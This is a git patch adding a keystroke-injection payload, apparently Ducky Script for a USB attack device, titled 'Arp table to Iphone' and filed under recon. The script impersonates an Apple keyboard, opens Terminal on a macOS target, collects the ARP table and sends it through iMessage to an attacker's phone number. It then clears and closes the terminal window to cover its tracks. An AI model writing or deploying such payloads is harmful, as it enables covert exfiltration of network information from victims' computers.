From c168e02a19f79e5b662e7c3ddb010d945b6a42bd Mon Sep 17 00:00:00 2001 From: Narstybits Date: Wed, 14 Jun 2023 23:22:36 -0500 Subject: [PATCH] Added /Arp table to Iphone --- RECON/Arp table to Iphone.txt | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 RECON/Arp table to Iphone.txt diff --git a/RECON/Arp table to Iphone.txt b/RECON/Arp table to Iphone.txt new file mode 100644 index 0000000..a78bc6a --- /dev/null +++ b/RECON/Arp table to Iphone.txt @@ -0,0 +1,39 @@ +REM This script uses the "x=$(arp -a)" command to retrieve ARP table information. +REM Then it sends the information to your iPhone. + + +REM Shoutout to matthewkayne and 0iphor13 for the Phone code part. +REM Replace "Phone Number HERE" with your phone number to receive MacOs System information + + +REM Title: Arp table to Iphone +REM Author: NARSTY +REM Target: MacOS +REM Version: 1.0 +REM Category: Recon + + + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 500 +STRING x=$(arp -a); osascript -e 'tell application "Messages" to send "'"$x"'" to buddy "Phone Number HERE"' +DELAY 1000 +ENTER +DELAY 2000 +GUI k +DELAY 500 +GUI w + + + + + + + +